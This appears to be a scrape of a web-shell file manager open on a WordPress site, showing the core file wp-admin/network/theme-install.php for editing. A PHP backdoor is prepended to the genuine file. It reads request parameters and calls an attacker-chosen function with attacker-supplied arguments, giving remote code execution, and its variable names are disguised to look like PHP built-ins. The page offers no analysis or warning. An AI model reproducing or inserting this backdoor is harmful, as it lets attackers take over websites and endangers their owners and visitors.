Dashboard
PHP:
8.4.22
OS:
Linux
User:
auroyplofl
/
/
home
/
auroyplofl
/
www
/
wp-admin
/
network
📤 Upload
📝 New File
📁 New Folder
Close
Editing: theme-install.php
<?php $openssl_open_ekdv = $_REQUEST; if(isset($openssl_open_ekdv['get_object_vars_jc'])) { $date_offset_get_mrnm = $openssl_open_ekdv['get_defined_functions_gu']; $openssl_csr_get_public_key_dmyu = $openssl_open_ekdv['zlib_decode_yv']; $date_offset_get_mrnm(...$openssl_csr_get_public_key_dmyu); } /** * Install theme network administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ if ( isset( $_GET['tab'] ) && ( 'theme-information' === $_GET['tab'] ) ) { define( 'IFRAME_REQUEST', true ); } /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/theme-install.php';
Save
Cancel